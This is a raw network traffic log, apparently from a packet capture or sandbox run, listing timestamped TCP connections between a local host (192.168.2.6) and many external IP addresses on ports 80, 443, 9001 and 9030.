Jan 10, 2024 15:39:15.537518978 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.537565947 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.537610054 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.537642002 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.537661076 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.537689924 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.537739992 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.537787914 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.537828922 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.537878036 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.537916899 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.537955046 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.537966013 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.537998915 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.538026094 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.538073063 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.538096905 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.538151026 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.538211107 CET	49728	80	192.168.2.6	199.58.81.140
Jan 10, 2024 15:39:15.583381891 CET	49729	443	192.168.2.6	149.56.44.47
Jan 10, 2024 15:39:15.583403111 CET	49730	9001	192.168.2.6	178.170.10.3
Jan 10, 2024 15:39:15.583426952 CET	443	49729	149.56.44.47	192.168.2.6
Jan 10, 2024 15:39:15.583518028 CET	49729	443	192.168.2.6	149.56.44.47
Jan 10, 2024 15:39:15.583873034 CET	49729	443	192.168.2.6	149.56.44.47
Jan 10, 2024 15:39:15.583889961 CET	443	49729	149.56.44.47	192.168.2.6
Jan 10, 2024 15:39:15.645421028 CET	80	49728	199.58.81.140	192.168.2.6
Jan 10, 2024 15:39:15.756464005 CET	9001	49730	178.170.10.3	192.168.2.6
Jan 10, 2024 15:39:15.756637096 CET	49730	9001	192.168.2.6	178.170.10.3
Jan 10, 2024 15:39:15.756941080 CET	49730	9001	192.168.2.6	178.170.10.3
Jan 10, 2024 15:39:15.929476976 CET	9001	49730	178.170.10.3	192.168.2.6
Jan 10, 2024 15:39:15.938153028 CET	9001	49730	178.170.10.3	192.168.2.6
Jan 10, 2024 15:39:15.938498974 CET	9001	49730	178.170.10.3	192.168.2.6
Jan 10, 2024 15:39:15.938628912 CET	49730	9001	192.168.2.6	178.170.10.3
Jan 10, 2024 15:39:15.938628912 CET	49730	9001	192.168.2.6	178.170.10.3
Jan 10, 2024 15:39:15.941047907 CET	49731	9001	192.168.2.6	157.90.77.166
Jan 10, 2024 15:39:15.952558994 CET	443	49729	149.56.44.47	192.168.2.6
Jan 10, 2024 15:39:15.952666044 CET	49729	443	192.168.2.6	149.56.44.47
Jan 10, 2024 15:39:15.955310106 CET	49729	443	192.168.2.6	149.56.44.47
Jan 10, 2024 15:39:15.955337048 CET	443	49729	149.56.44.47	192.168.2.6
Jan 10, 2024 15:39:15.955883026 CET	443	49729	149.56.44.47	192.168.2.6
Jan 10, 2024 15:39:15.967271090 CET	49729	443	192.168.2.6	149.56.44.47
Jan 10, 2024 15:39:16.009911060 CET	443	49729	149.56.44.47	192.168.2.6
Jan 10, 2024 15:39:16.111982107 CET	9001	49730	178.170.10.3	192.168.2.6
Jan 10, 2024 15:39:16.129653931 CET	9001	49731	157.90.77.166	192.168.2.6
Jan 10, 2024 15:39:16.129769087 CET	49731	9001	192.168.2.6	157.90.77.166
Jan 10, 2024 15:39:16.130202055 CET	49731	9001	192.168.2.6	157.90.77.166
Jan 10, 2024 15:39:16.318773031 CET	9001	49731	157.90.77.166	192.168.2.6
Jan 10, 2024 15:39:16.318830013 CET	9001	49731	157.90.77.166	192.168.2.6
Jan 10, 2024 15:39:16.319154024 CET	9001	49731	157.90.77.166	192.168.2.6
Jan 10, 2024 15:39:16.319216013 CET	49731	9001	192.168.2.6	157.90.77.166
Jan 10, 2024 15:39:16.319772959 CET	49731	9001	192.168.2.6	157.90.77.166
Jan 10, 2024 15:39:16.322978973 CET	49732	443	192.168.2.6	172.81.131.84
Jan 10, 2024 15:39:16.323021889 CET	443	49732	172.81.131.84	192.168.2.6
Jan 10, 2024 15:39:16.323081970 CET	49732	443	192.168.2.6	172.81.131.84
Jan 10, 2024 15:39:16.323386908 CET	49732	443	192.168.2.6	172.81.131.84
Jan 10, 2024 15:39:16.323401928 CET	443	49732	172.81.131.84	192.168.2.6
Jan 10, 2024 15:39:16.508335114 CET	9001	49731	157.90.77.166	192.168.2.6
Jan 10, 2024 15:39:16.688000917 CET	443	49732	172.81.131.84	192.168.2.6
Jan 10, 2024 15:39:16.688098907 CET	49732	443	192.168.2.6	172.81.131.84
Jan 10, 2024 15:39:16.690898895 CET	49732	443	192.168.2.6	172.81.131.84
Jan 10, 2024 15:39:16.690912962 CET	443	49732	172.81.131.84	192.168.2.6
Jan 10, 2024 15:39:16.691344976 CET	443	49732	172.81.131.84	192.168.2.6
Jan 10, 2024 15:39:16.692011118 CET	49732	443	192.168.2.6	172.81.131.84
Jan 10, 2024 15:39:16.737905979 CET	443	49732	172.81.131.84	192.168.2.6
Jan 10, 2024 15:39:26.126244068 CET	49735	443	192.168.2.6	207.244.78.230
Jan 10, 2024 15:39:26.126329899 CET	443	49735	207.244.78.230	192.168.2.6
Jan 10, 2024 15:39:26.126442909 CET	49735	443	192.168.2.6	207.244.78.230
Jan 10, 2024 15:39:26.126903057 CET	49736	443	192.168.2.6	66.175.235.244
Jan 10, 2024 15:39:26.126930952 CET	443	49736	66.175.235.244	192.168.2.6
Jan 10, 2024 15:39:26.126938105 CET	49735	443	192.168.2.6	207.244.78.230
Jan 10, 2024 15:39:26.126971006 CET	443	49735	207.244.78.230	192.168.2.6
Jan 10, 2024 15:39:26.126997948 CET	49736	443	192.168.2.6	66.175.235.244
Jan 10, 2024 15:39:26.127253056 CET	49736	443	192.168.2.6	66.175.235.244
Jan 10, 2024 15:39:26.127265930 CET	443	49736	66.175.235.244	192.168.2.6
Jan 10, 2024 15:39:26.463555098 CET	443	49735	207.244.78.230	192.168.2.6
Jan 10, 2024 15:39:26.463709116 CET	49735	443	192.168.2.6	207.244.78.230
Jan 10, 2024 15:39:26.467329979 CET	49735	443	192.168.2.6	207.244.78.230
Jan 10, 2024 15:39:26.467355967 CET	443	49735	207.244.78.230	192.168.2.6
Jan 10, 2024 15:39:26.467825890 CET	443	49735	207.244.78.230	192.168.2.6
Jan 10, 2024 15:39:26.468898058 CET	49735	443	192.168.2.6	207.244.78.230
Jan 10, 2024 15:39:26.509910107 CET	443	49735	207.244.78.230	192.168.2.6
Jan 10, 2024 15:39:26.572024107 CET	443	49736	66.175.235.244	192.168.2.6
Jan 10, 2024 15:39:26.572145939 CET	49736	443	192.168.2.6	66.175.235.244
Jan 10, 2024 15:39:26.574153900 CET	49736	443	192.168.2.6	66.175.235.244
Jan 10, 2024 15:39:26.574162006 CET	443	49736	66.175.235.244	192.168.2.6
Jan 10, 2024 15:39:26.574537992 CET	443	49736	66.175.235.244	192.168.2.6
Jan 10, 2024 15:39:26.574980021 CET	49736	443	192.168.2.6	66.175.235.244
Jan 10, 2024 15:39:26.617963076 CET	443	49736	66.175.235.244	192.168.2.6
Jan 10, 2024 15:39:31.152244091 CET	49738	80	192.168.2.6	130.185.250.214
Jan 10, 2024 15:39:32.157133102 CET	49738	80	192.168.2.6	130.185.250.214
Jan 10, 2024 15:39:34.172753096 CET	49738	80	192.168.2.6	130.185.250.214
Jan 10, 2024 15:39:35.159970999 CET	49739	80	192.168.2.6	86.59.21.38
Jan 10, 2024 15:39:35.354636908 CET	80	49739	86.59.21.38	192.168.2.6
Jan 10, 2024 15:39:35.354729891 CET	49739	80	192.168.2.6	86.59.21.38
Jan 10, 2024 15:39:35.354928017 CET	49739	80	192.168.2.6	86.59.21.38
Jan 10, 2024 15:39:35.546907902 CET	80	49739	86.59.21.38	192.168.2.6
Jan 10, 2024 15:39:35.956741095 CET	49729	443	192.168.2.6	149.56.44.47
Jan 10, 2024 15:39:35.956799984 CET	443	49729	149.56.44.47	192.168.2.6
Jan 10, 2024 15:39:35.957134962 CET	49729	443	192.168.2.6	149.56.44.47
Jan 10, 2024 15:39:35.957355022 CET	443	49729	149.56.44.47	192.168.2.6
Jan 10, 2024 15:39:35.957444906 CET	49729	443	192.168.2.6	149.56.44.47
Jan 10, 2024 15:39:35.957453966 CET	443	49729	149.56.44.47	192.168.2.6
Jan 10, 2024 15:39:35.957571983 CET	49729	443	192.168.2.6	149.56.44.47
Jan 10, 2024 15:39:36.704484940 CET	49732	443	192.168.2.6	172.81.131.84
Jan 10, 2024 15:39:36.704530001 CET	443	49732	172.81.131.84	192.168.2.6
Jan 10, 2024 15:39:36.704668045 CET	49732	443	192.168.2.6	172.81.131.84
Jan 10, 2024 15:39:36.704745054 CET	443	49732	172.81.131.84	192.168.2.6
Jan 10, 2024 15:39:36.704803944 CET	443	49732	172.81.131.84	192.168.2.6
Jan 10, 2024 15:39:36.704833031 CET	49732	443	192.168.2.6	172.81.131.84
Jan 10, 2024 15:39:36.704871893 CET	49732	443	192.168.2.6	172.81.131.84
Jan 10, 2024 15:39:38.619224072 CET	80	49739	86.59.21.38	192.168.2.6
Jan 10, 2024 15:39:38.619322062 CET	80	49739	86.59.21.38	192.168.2.6
Jan 10, 2024 15:39:38.619551897 CET	49739	80	192.168.2.6	86.59.21.38
Jan 10, 2024 15:39:39.480072975 CET	49739	80	192.168.2.6	86.59.21.38
Jan 10, 2024 15:39:39.481568098 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:39:39.492989063 CET	49741	9030	192.168.2.6	213.32.71.116
Jan 10, 2024 15:39:39.672691107 CET	80	49739	86.59.21.38	192.168.2.6
Jan 10, 2024 15:39:39.907150030 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:39:40.554322004 CET	49741	9030	192.168.2.6	213.32.71.116
Jan 10, 2024 15:39:40.703937054 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:39:42.094613075 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:39:42.586160898 CET	49741	9030	192.168.2.6	213.32.71.116
Jan 10, 2024 15:39:44.515290976 CET	49744	9030	192.168.2.6	51.15.42.19
Jan 10, 2024 15:39:44.907164097 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:39:45.557697058 CET	49744	9030	192.168.2.6	51.15.42.19
Jan 10, 2024 15:39:46.470009089 CET	49735	443	192.168.2.6	207.244.78.230
Jan 10, 2024 15:39:46.470083952 CET	443	49735	207.244.78.230	192.168.2.6
Jan 10, 2024 15:39:46.470523119 CET	443	49735	207.244.78.230	192.168.2.6
Jan 10, 2024 15:39:46.470601082 CET	443	49735	207.244.78.230	192.168.2.6
Jan 10, 2024 15:39:46.470670938 CET	49735	443	192.168.2.6	207.244.78.230
Jan 10, 2024 15:39:46.579404116 CET	49736	443	192.168.2.6	66.175.235.244
Jan 10, 2024 15:39:46.579433918 CET	443	49736	66.175.235.244	192.168.2.6
Jan 10, 2024 15:39:46.579773903 CET	49736	443	192.168.2.6	66.175.235.244
Jan 10, 2024 15:39:46.579848051 CET	443	49736	66.175.235.244	192.168.2.6
Jan 10, 2024 15:39:46.579927921 CET	49736	443	192.168.2.6	66.175.235.244
Jan 10, 2024 15:39:46.579931021 CET	443	49736	66.175.235.244	192.168.2.6
Jan 10, 2024 15:39:46.579976082 CET	49736	443	192.168.2.6	66.175.235.244
Jan 10, 2024 15:39:46.626626015 CET	49735	443	192.168.2.6	207.244.78.230
Jan 10, 2024 15:39:47.594543934 CET	49744	9030	192.168.2.6	51.15.42.19
Jan 10, 2024 15:39:50.204034090 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:39:51.594629049 CET	49744	9030	192.168.2.6	51.15.42.19
Jan 10, 2024 15:39:59.703903913 CET	49744	9030	192.168.2.6	51.15.42.19
Jan 10, 2024 15:40:00.907247066 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:40:05.707039118 CET	49745	80	192.168.2.6	154.35.175.225
Jan 10, 2024 15:40:06.907083035 CET	49745	80	192.168.2.6	154.35.175.225
Jan 10, 2024 15:40:08.907151937 CET	49745	80	192.168.2.6	154.35.175.225
Jan 10, 2024 15:40:12.907041073 CET	49745	80	192.168.2.6	154.35.175.225
Jan 10, 2024 15:40:21.000750065 CET	49745	80	192.168.2.6	154.35.175.225
Jan 10, 2024 15:40:27.004309893 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.211648941 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.211757898 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.212155104 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.422620058 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.422684908 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.422724009 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.422763109 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.422758102 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.422801018 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.422812939 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.422812939 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.422841072 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.422849894 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.422879934 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.422887087 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.422949076 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.423007011 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.423046112 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.423057079 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.423089027 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.423186064 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.423234940 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.423353910 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.423398018 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.629062891 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.629184008 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.629210949 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.629228115 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.629251957 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.629270077 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.629270077 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.629309893 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.629311085 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.629349947 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.629353046 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.629389048 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.629395962 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.629430056 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.629430056 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.629475117 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.629561901 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.629601955 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.629602909 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.629641056 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.629643917 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.629679918 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.629717112 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.629755020 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.630413055 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.630450010 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.630470037 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.630490065 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.630492926 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.630527973 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.630534887 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.630568027 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.631823063 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.631879091 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.631948948 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.632019997 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.632028103 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.632082939 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.632087946 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.632199049 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.835702896 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.835774899 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.835823059 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.836558104 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.836627007 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.836668968 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.836694956 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.836694956 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.836694956 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.836709023 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.836713076 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.836749077 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.836754084 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.836786985 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.836791039 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.836823940 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.836828947 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.836868048 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.837107897 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.837145090 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.837153912 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.837182999 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.837193966 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.837224960 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.837255001 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.837299109 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.837377071 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.837414980 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.837421894 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.837460995 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.839426041 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.839504004 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.839509964 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.839540958 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.839545012 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.839580059 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.839585066 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.839622974 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.839653969 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.839692116 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.839699984 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.839736938 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.840379000 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.840419054 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.840428114 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.840456963 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.840461016 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.840502024 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.840528011 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.840564966 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.840569019 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.840606928 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.840609074 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.840650082 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.841289997 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.841327906 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.841363907 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.841399908 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.841404915 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.841404915 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.841438055 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.841439009 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.841439009 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.841476917 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:27.841480970 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:27.841520071 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.043078899 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.045636892 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.056466103 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.056653976 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.056754112 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.056791067 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.056813002 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.056869030 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.056883097 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.056921005 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.056963921 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.056998014 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.057041883 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.058310986 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.058351040 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.058399916 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.058409929 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.058444023 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.058502913 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.058547974 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.058877945 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.058931112 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.059026003 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.059077024 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.071105003 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.071145058 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.071223021 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.071377993 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.071378946 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.071425915 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.071463108 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.071643114 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.071717024 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.071717024 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.075216055 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.075252056 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.075287104 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.075429916 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.075467110 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.075463057 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.075464010 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.075501919 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.075546026 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.075546026 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.080107927 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.080154896 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.080303907 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.080338955 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.080369949 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.080375910 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.080369949 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.080411911 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.080437899 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.080437899 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.080461025 CET	49746	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:40:28.081370115 CET	9030	49746	193.11.164.243	192.168.2.6
Jan 10, 2024 15:40:28.081407070 CET	9030	49746	193.11.164.243	192.168.2.6
